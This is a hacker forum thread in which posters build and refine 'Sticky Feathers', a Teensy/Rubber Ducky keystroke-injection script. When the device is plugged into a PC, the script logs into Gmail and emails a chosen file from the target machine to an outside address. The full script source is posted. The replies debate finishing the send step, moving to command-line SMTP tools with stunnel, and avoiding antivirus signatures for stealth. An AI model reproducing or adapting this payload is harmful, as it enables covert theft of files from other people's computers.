[Version 1] Sticky Feathers - Rubber Ducky Auto-mailer

[HoboCop]

Here's a little experiment I've been tinkering with. This code makes the ducky open up gmail (via IE), login, attach a pre-determined file from the target PC, and send it to yourself for later (or any address you want, really).

This could be used for collecting the same file from multiple pc's for sys-admins, or you know, other fun stuff. Right now the delays are set longer than necessary for testing purposes as different systems will have longer / shorter load times. With some optimization it could definitely run much faster.

Also note that this is set up for a recipient address that is already one of your contacts (yourself in this case), if you want to send it to an address not in your contacts you would have to remove one of the tabs after the address.

// "Sticky Feathers" for Rubber Ducky by Sintax77
// Started with the script "DUCKY_WAS_HERE" - as a base for this. (thanks!)


int ledPin = 11;


void setup() {

pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim

ledstart(); // lights up when connected
delay(4000); // delay for computer
ledstart(); // lights up when payload starts
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_key2(0);
Keyboard.send_now();
d(); // this is a 100ms delay, see below for commands.
Keyboard.print("iexplore.exe www.gmail.com"); // Opens gmail in browser
d();
enter();
delay(5000); // delay for browser to load
Keyboard.print("username!goes!here"); //Enter you username here
Keyboard.send_now();
//possible delay
//d();
tab();
Keyboard.print("password!goes!here"); //Enter your password here
Keyboard.send_now();
enter();
d();
delay(8000); // delay for gmail page to load
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_key1(KEY_L);
Keyboard.send_now();
Keyboard.set_key2(0);
Keyboard.send_now();
delay(2000); // delay for IE address input page to load
Keyboard.print("https://mail.google.com/mail/?shva=1#compose"); //type address to compose new e-mail
Keyboard.send_now();
enter();
d();
delay(2000); //
Keyboard.print("vampiretap"); //first part of destination address
Keyboard.send_now();
delay(400);
Keyboard.set_modifier(MODIFIERKEY_SHIFT); //hold shift + 2 for the @ symbol
Keyboard.send_now();
Keyboard.set_key1(KEY_2);
Keyboard.send_now();
Keyboard.set_key2(0);
Keyboard.send_now();
Keyboard.print("gmail.com"); //second part of destination address
Keyboard.send_now();
delay(800);
tab();
delay(800);
//tab();
delay(800);
tab();
Keyboard.print("example subject"); //type subject here
Keyboard.send_now();
delay(400);
tab();
delay(200);
Keyboard.print("message body"); //type message body here
Keyboard.send_now();
delay(400);
tab();
delay(200);
tab();
delay(200);
tab();
delay(200);
tab();
delay(200);
tab();
delay(200);
tab();
delay(400);
enter();
delay(4000);
Keyboard.print("path to target file"); //type file path here
Keyboard.send_now();



}

void loop() {
  // Maybe a flashing LED?
}

void enter() {
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void tab() {
  Keyboard.set_key1(KEY_TAB);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void sendClearKeys() {
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

}

// LED command for end of script.
void ledend(){

Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.set_modifier(0);
Keyboard.send_now();

digitalWrite(ledPin, HIGH);
delay (500);
digitalWrite(ledPin, LOW);
delay (500);
digitalWrite(ledPin, HIGH);
delay (500);
digitalWrite(ledPin, LOW);
}
// LED command for start of script
void ledstart(){

digitalWrite(ledPin, HIGH);
delay (1000);
digitalWrite(ledPin, LOW);
}
// delay 100ms
void d(){
delay(100);
}

[HoboCop]

I thought it would be simple enough to add the gmail shortcut for "send" to the above code (as of now it stops after selecting the target file), but it turns out that the keyboard shortcut is TAB + ENTER. Unfortunately TAB doesn't appear to be a valid modifier key.

Anyone have any ideas on how to achieve this?

[Mr-Protocol]

I thought it would be simple enough to add the gmail shortcut for "send" to the above code (as of now it stops after selecting the target file), but it turns out that the keyboard shortcut is TAB + ENTER. Unfortunately TAB doesn't appear to be a valid modifier key.

Anyone have any ideas on how to achieve this?

http://www.pjrc.com/teensy/td_keyboard.html

Under "All Key Codes"

KEY_TAB

Normal Keys
KEY_A    KEY_B    KEY_C    KEY_D
KEY_E    KEY_F    KEY_G    KEY_H
KEY_I    KEY_J    KEY_K    KEY_L
KEY_M    KEY_N    KEY_O    KEY_P
KEY_Q    KEY_R    KEY_S    KEY_T
KEY_U    KEY_V    KEY_W    KEY_X
KEY_Y    KEY_Z    KEY_1    KEY_2
KEY_3    KEY_4    KEY_5    KEY_6
KEY_7    KEY_8    KEY_9    KEY_0
KEY_ENTER    KEY_ESC    KEY_BACKSPACE    KEY_TAB
KEY_SPACE    KEY_MINUS    KEY_EQUAL    KEY_LEFT_BRACE
KEY_RIGHT_BRACE    KEY_BACKSLASH    KEY_NUMBER    KEY_SEMICOLON
KEY_QUOTE    KEY_TILDE    KEY_COMMA    KEY_PERIOD
KEY_SLASH    KEY_CAPS_LOCK    KEY_F1    KEY_F2
KEY_F3    KEY_F4    KEY_F5    KEY_F6
KEY_F7    KEY_F8    KEY_F9    KEY_F10
KEY_F11    KEY_F12    KEY_PRINTSCREEN    KEY_SCROLL_LOCK
KEY_PAUSE    KEY_INSERT    KEY_HOME    KEY_PAGE_UP
KEY_DELETE    KEY_END    KEY_PAGE_DOWN    KEY_RIGHT
KEY_LEFT    KEY_DOWN    KEY_UP    KEY_NUM_LOCK
KEYPAD_SLASH    KEYPAD_ASTERIX    KEYPAD_MINUS    KEYPAD_PLUS
KEYPAD_ENTER    KEYPAD_1    KEYPAD_2    KEYPAD_3
KEYPAD_4    KEYPAD_5    KEYPAD_6    KEYPAD_7
KEYPAD_8    KEYPAD_9    KEYPAD_0    KEYPAD_PERIOD

[HoboCop]

http://www.pjrc.com/teensy/td_keyboard.html

Under "All Key Codes"

KEY_TAB

Thanks, Protocol, but unfortunately I got a compiling error when attempting to use MODIFIERKEY_TAB as only shift, ctrl, alt and GUI are listed as valid modifiers. I may just have to manually tab there as I did with the other steps, but I was trying to avoid it as it looks like it's going to take 30 tabs to navigate there. I'll play around with it some more tomorrow.

[Deevd]

wouldn't it be easier to do this via cmd and smtp??

[HoboCop]

wouldn't it be easier to do this via cmd and smtp??

Quite possibly, but then what would I do with my free time? Jk. Seriously though, I did think of that for about 3 seconds, but I have limited experience with that. So I decided to jusit play around with the web interface. I'm definitely interested in learning how to do it via cmd as well, as it could be much more stealty and quick.

[Deevd]

Quite possibly, but then what would I do with my free time? Jk. Seriously though, I did think of that for about 3 seconds, but I have limited experience with that. So I decided to jusit play around with the web interface. I'm definitely interested in learning how to do it via cmd as well, as it could be much more stealty and quick.

http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol

all the info you need ;)

[HoboCop]

Thanks for the info / inspiration, Deevd. I'm on the beach taking Crown shots out of scavenged sea shells right now, but I'll be diving into this tomorrow night.

[HoboCop]

Ok, back from the beach and here's where I'm at.

Regarding the web interface, I am experiencing some complications regarding the last set of "tabs" to navigate to the send button. Strangely, when I add in the tabs at the end it throws off the timing for the whole script prior to that. Very strange indeed. So I'm still working on that...

As far as the cmd version goes: I have found two possible programs to send an attachment from the windows command line.

The first is called bmail. The sweet thing about this is that it's only 17K! I cant remember off the top of my head, but this may be small enough to fit on the teensy in disk mode without an sd reader attached.

The second one is called blat. This one is much larger, but it seems to be geared more specifically towards sending file attachments from the command line. We'd have to rock the card reader attachment with this one.

Here's the snag with both, neither appears to support ssl so connecting to gmail and I believe yahoo, hotmail etc appears to be out as they require ssl from what I've read. Sooo, the question to my hak5 friends out there is this; Anyone know of a free email service that doesn't give a hoot about ssl? (Without using a time machine)

Edited June 8, 2010 by sintax77

[Deevd]

Ok, back from the beach and here's where I'm at.

Regarding the web interface, I am experiencing some complications regarding the last set of "tabs" to navigate to the send button. Strangely, when I add in the tabs at the end it throws off the timing for the whole script prior to that. Very strange indeed. So I'm still working on that...

As far as the cmd version goes: I have found two possible programs to send an attachment from the windows command line.

The first is called bmail. The sweet thing about this is that it's only 17K! I cant remember off the top of my head, but this may be small enough to fit on the teensy in disk mode without an sd reader attached.

The second one is called blat. This one is much larger, but it seems to be geared more specifically towards sending file attachments from the command line. We'd have to rock the card reader attachment with this one.

nice work :)

Sorry , but for the SSL part I've no idea :)

[HoboCop]

Well, why re-invent the wheel if you don't have to? Almost embarrassingly, it dawned on me that the hacksaw managed to pull off nabbing files via google's smtp many moons ago. I never played with the hacksaw when it originally came out, but it appears the missing link to my ssl problem could be stunnel.

Now, I don't know a damned thing about using this program [yet], but I guess it's time to learn.

That being said, it's becoming clear at this point that using the card reader attachment has become a necessity in order to deliver the payload of programs required to pull this off via cmd. This kind of thwarts my original inspiration for using the web interface; no executables = no AV signature. But that's another story, I suppose...